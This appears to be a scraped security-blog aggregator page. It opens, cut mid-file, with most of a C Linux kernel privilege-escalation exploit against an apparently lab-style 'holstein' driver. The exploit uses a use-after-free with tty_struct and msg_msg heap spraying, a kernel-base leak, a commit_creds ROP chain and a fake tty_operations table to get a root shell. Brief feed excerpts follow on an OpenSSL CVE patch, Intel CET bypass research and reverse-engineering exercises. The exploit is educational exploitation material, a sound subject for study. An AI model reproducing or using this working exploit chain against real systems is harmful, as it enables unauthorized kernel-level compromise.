            err("Got an unexpected tty_struct->ops ptr");
        }
    }
    
    void solve_gadgets(void) {
        // 0x723c0: commit_creds
        commit_creds = base + 0x723c0ULL;
        printf("    >> commit_creds located @ 0x%lx\n", commit_creds);
    
        // 0x72560: prepare_kernel_cred
        prepare_kernel_cred = base + 0x72560ULL;
        printf("    >> prepare_kernel_cred located @ 0x%lx\n", prepare_kernel_cred);
    
        // 0x800e10: swapgs_restore_regs_and_return_to_usermode
        kpti_tramp = base + 0x800e10ULL + 22; // 22 offset, avoid pops
        printf("    >> kpti_tramp located @ 0x%lx\n", kpti_tramp);
    
        // 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
        push_rdx = base + 0x14fbeaULL;
        printf("    >> push_rdx located @ 0x%lx\n", push_rdx);
    
        // 0x35738d: pop rdi; ret;
        pop_rdi = base + 0x35738dULL;
        printf("    >> pop_rdi located @ 0x%lx\n", pop_rdi);
    
        // 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
        xchg_rdi_rax = base + 0x487980ULL;
        printf("    >> xchg_rdi_rax located @ 0x%lx\n", xchg_rdi_rax);
    
        // 0x32afea: ret;
        ret = base + 0x32afeaULL;
        printf("    >> ret located @ 0x%lx\n", ret);
    }
    
    // Initialize a kernel message queue
    void init_msg_q(void) {
        int msg_qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
        if (msg_qid == -1) {
            err("`msgget()` failed to initialize queue");
        }
    
        msg_queue[num_queue] = msg_qid;
        num_queue++;
    }
    
    // Allocate one msg_msg on the heap
    size_t send_message() {
        // Calculate current queue
        if (num_queue < 1) {
            err("`send_message()` called with no message queues");
        }
        int curr_q = msg_queue[num_queue - 1];
    
        // Send message
        size_t fails = 0;
        struct msgbuf {
            long mtype;
            char mtext[MSG_SZ];
        } msg;
    
        // Unique identifier we can use
        msg.mtype = 0x1337;
    
        // Construct the ROP chain
        memset(msg.mtext, 0, MSG_SZ);
    
        // Pattern for offsets (debugging)
        uint64_t base = 0x41;
        uint64_t *curr = (uint64_t *)&msg.mtext[0];
        for (size_t i = 0; i < 25; i++) {
            uint64_t fill = base << 56;
            fill |= base << 48;
            fill |= base << 40;
            fill |= base << 32;
            fill |= base << 24;
            fill |= base << 16;
            fill |= base << 8;
            fill |= base;
            
            *curr++ = fill;
            base++; 
        }
    
        // ROP chain
        uint64_t *rop = (uint64_t *)&msg.mtext[0];
        *rop++ = pop_rdi; 
        *rop++ = 0x0;
        *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
        *rop++ = xchg_rdi_rax; // Place creds into RDI 
        *rop++ = commit_creds; // Now we have super powers
        *rop++ = kpti_tramp;
        *rop++ = 0x0; // pop rax inside kpti_tramp
        *rop++ = 0x0; // pop rdi inside kpti_tramp
        *rop++ = (uint64_t)pop_shell; // Return here
        *rop++ = user_cs;
        *rop++ = user_rflags;
        *rop++ = user_sp;
        *rop   = user_ss;
    
        /* struct tty_operations {
            struct tty_struct * (*lookup)(struct tty_driver *driver,
                    struct file *filp, int idx);
            int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
            void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
            int  (*open)(struct tty_struct * tty, struct file * filp);
            void (*close)(struct tty_struct * tty, struct file * filp);
            void (*shutdown)(struct tty_struct *tty);
            void (*cleanup)(struct tty_struct *tty);
            int  (*write)(struct tty_struct * tty,
                    const unsigned char *buf, int count);
            int  (*put_char)(struct tty_struct *tty, unsigned char ch);
            void (*flush_chars)(struct tty_struct *tty);
            unsigned int (*write_room)(struct tty_struct *tty);
            unsigned int (*chars_in_buffer)(struct tty_struct *tty);
            int  (*ioctl)(struct tty_struct *tty,
                    unsigned int cmd, unsigned long arg);
            ...
        } */
    
        // Populate the 12 function pointers in the table that we have created.
        // There are 3 handlers that are invoked for allocated tty_structs when 
        // their controlling process exits, they are close(), shutdown(),
        // and cleanup(). We have to overwrite these pointers for when we exit our
        // exploit process or else the kernel will panic with a RIP of 
        // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
        uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
        for (size_t i = 0; i < 12; i++) {
            // If i == 4, we're on the close() handler, set to ret gadget
            if (i == 4) { *func_table++ = ret; continue; }
    
            // If i == 5, we're on the shutdown() handler, set to ret gadget
            if (i == 5) { *func_table++ = ret; continue; }
    
            // If i == 6, we're on the cleanup() handler, set to ret gadget
            if (i == 6) { *func_table++ = ret; continue; }
    
            // Magic value for debugging
            *func_table++ = 0xdeadbeefdeadbe00 + i;
        }
    
        // Put our gadget address as the ioctl() handler to pivot stack
        *func_table = push_rdx;
    
        // Spray msg_msg's on the heap
        if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
            fails++;
        }
    
        return fails;
    }
    
    // Check to see if we have a reference to one of our msg_msg structs
    bool found_msg(int fd) {
        // Read out the msg_msg
        unsigned char msg_buf[GBUF_SZ] = { 0 };
        ssize_t bytes_read = read(fd, msg_buf, GBUF_SZ);
        if (bytes_read != (ssize_t)GBUF_SZ) {
            err("Failed to read from holstein");
        }
    
        /* msg_msg {
            struct list_head m_list {
                struct list_head *next, *prev;
            } // 16 bytes
            long m_type; // 8 bytes
            int m_ts; // 4 bytes
            struct msg_msgseg* next; // 8 bytes
            void *security; // 8 bytes
    
            ===== Body Starts Here (offset 48) =====
        }*/ 
    
        // Some heuristics to see if we indeed have a good msg_msg
        uint64_t next = *(uint64_t *)&msg_buf[0];
        uint64_t prev = *(uint64_t *)&msg_buf[sizeof(uint64_t)];
        int64_t m_type = *(uint64_t *)&msg_buf[sizeof(uint64_t) * 2];
    
        // Not one of our msg_msg structs
        if (m_type != 0x1337L) {
            return false;
        }
    
        // We have to have valid pointers
        if (next == 0 || prev == 0) {
            return false;
        }
    
        // I think the pointers should be different as well
        if (next == prev) {
            return false;
        }
    
        info("Found msg_msg struct:");
        printf("    >> msg_msg.m_list.next: 0x%lx\n", next);
        printf("    >> msg_msg.m_list.prev: 0x%lx\n", prev);
        printf("    >> msg_msg.m_type: 0x%lx\n", m_type);
    
        // Update rop address
        rop_addr = 48 + next;
        
        return true;
    }
    
    void overwrite_ops(int fd) {
        unsigned char g_buf[GBUF_SZ] = { 0 };
        ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
        if (bytes_read != (ssize_t)GBUF_SZ) {
            err("Failed to read enough bytes from fd: %d", fd);
        }
    
        // Overwrite the tty_struct->ops pointer with ROP address
        *(uint64_t *)&g_buf[24] = fake_table;
        ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
        if (bytes_written != (ssize_t)GBUF_SZ) {
            err("Failed to write enough bytes to fd: %d", fd);
        }
    }
    
    int main(int argc, char *argv[]) {
        int fd1;
        int fd2;
        int fd3;
        int fd4;
        int fd5;
        int fd6;
    
        info("Saving user space state...");
        save_state();
    
        info("Freeing fd1...");
        fd1 = open_device(DEV, O_RDWR);
        fd2 = open(DEV, O_RDWR);
        close(fd1);
    
        // Allocate '/dev/ptmx' structs until we allocate one in our free'd slab
        info("Spraying tty_structs...");
        size_t p_remain = PTMX_SPRAY;
        while (p_remain--) {
            alloc_ptmx();
            printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);
    
            // Check to see if we found one of our tty_structs
            if (found_ptmx(fd2)) {
                break;
            }
    
            if (p_remain == 0) { err("Failed to find tty_struct"); }
        }
    
        info("Leaking tty_struct->ops...");
        base = leak_ops(fd2);
        info("Kernel base: 0x%lx", base);
    
        // Clean up open fds
        info("Cleaning up our tty_structs...");
        for (size_t i = 0; i < num_ptmx; i++) {
            close(open_ptmx[i]);
            open_ptmx[i] = 0;
        }
        num_ptmx = 0;
    
        // Solve the gadget addresses now that we have base
        info("Solving gadget addresses");
        solve_gadgets();
    
        // Create a hole for a msg_msg
        info("Freeing fd3...");
        fd3 = open_device(DEV, O_RDWR);
        fd4 = open_device(DEV, O_RDWR);
        close(fd3);
    
        // Allocate msg_msg structs until we allocate one in our free'd slab
        size_t q_remain = NUM_QUEUE;
        size_t fails = 0;
        while (q_remain--) {
            // Initialize a message queue for spraying msg_msg structs
            init_msg_q();
            printf("    >> msg_msg queue(s) initialized: %lu\n",
                NUM_QUEUE - q_remain);
            
            // Spray messages for this queue
            for (size_t i = 0; i < MSG_SPRAY; i++) {
                fails += send_message();
            }
    
            // Check to see if we found a msg_msg struct
            if (found_msg(fd4)) {
                break;
            }
            
            if (q_remain == 0) { err("Failed to find msg_msg struct"); }
        }
        
        // Solve our ROP chain address
        info("`msgsnd()` failures: %lu", fails);
        info("ROP chain address: 0x%lx", rop_addr);
        fake_table = rop_addr + rop_len;
        info("Fake tty_struct->ops function table: 0x%lx", fake_table);
        ioctl_ptr = fake_table + ioctl_off;
        info("Fake ioctl() handler: 0x%lx", ioctl_ptr);
    
        // Do a 3rd UAF
        info("Freeing fd5...");
        fd5 = open_device(DEV, O_RDWR);
        fd6 = open_device(DEV, O_RDWR);
        close(fd5);
    
        // Spray more /dev/ptmx terminals
        info("Spraying tty_structs...");
        p_remain = PTMX_SPRAY;
        while(p_remain--) {
            alloc_ptmx();
            printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);
    
            // Check to see if we found a tty_struct
            if (found_ptmx(fd6)) {
                break;
            }
    
            if (p_remain == 0) { err("Failed to find tty_struct"); }
        }
    
        info("Found new tty_struct");
        info("Overwriting tty_struct->ops pointer with fake table...");
        overwrite_ops(fd6);
        info("Overwrote tty_struct->ops");
    
        // Spam IOCTL on all of our '/dev/ptmx' fds
        info("Spamming `ioctl()`...");
        for (size_t i = 0; i < num_ptmx; i++) {
            ioctl(open_ptmx[i], 0xcafebabe, rop_addr - 8); // pop rbp; ret;
        }
    
        return 0;
    }
    

    Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)

    1 November 2022 at 10:27

    Discussion thread: https://updatedsecurity.com/topic/9-openssl-vulnerability-cve-2022-3602-cve-2022-3786/

    Vulnerability Details (from https://www.openssl.org/news/secadv/20221101.txt):

    X.509 Email Address 4-byte Buffer Overflow (CVE-2022-3602)
    Severity: High

    A buffer overrun can be triggered in X.509

    The post Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786) appeared first on MalwareTech.

    Bypassing Intel CET with Counterfeit Objects

    10 June 2022 at 00:00
    Since its inception in 2005, return-oriented programming (ROP) has been the predominant avenue to thwart W^X mitigation during memory corruption exploitation. While Data Execution Prevention (DEP) has been engineered to block plain code injection attacks from specific memory areas, attackers have quickly adapted and, instead of injecting an entire code payload, they resorted to reusing multiple code chunks from DEP-allowed memory pages, called ROP gadgets. These code chunks are taken from already existing code in the target application and chained together to resemble the desired attacker payload or to just disable DEP on a per-page basis to allow the existing code payloads to run.

    'Practical Reverse Engineering' Solutions - Chapter 1 - Part 2

    1 December 2022 at 00:00
    Introduction: From now on, I decided to prioritize the exercises from which I think I can gain the most, so here I am going to cover just the kernel routine decompilation/explanation. The book has focused on x86 up to this point, but since we are in 2020 I feel it might be useful to cover both x86 and x64. Chapter 1 - Page 35: Decompile the following kernel routines in Windows: KeInitializeDpc, KeInitializeApc, ObFastDereferenceObject (and explain its calling convention), KeInitializeQueue, KxWaitForLockChainValid, KeReadyThread, KiInitializeTSS, RtlValidateUnicodeString. Debugging Setup: For debugging purposes I have used WinDbg with remote KD.
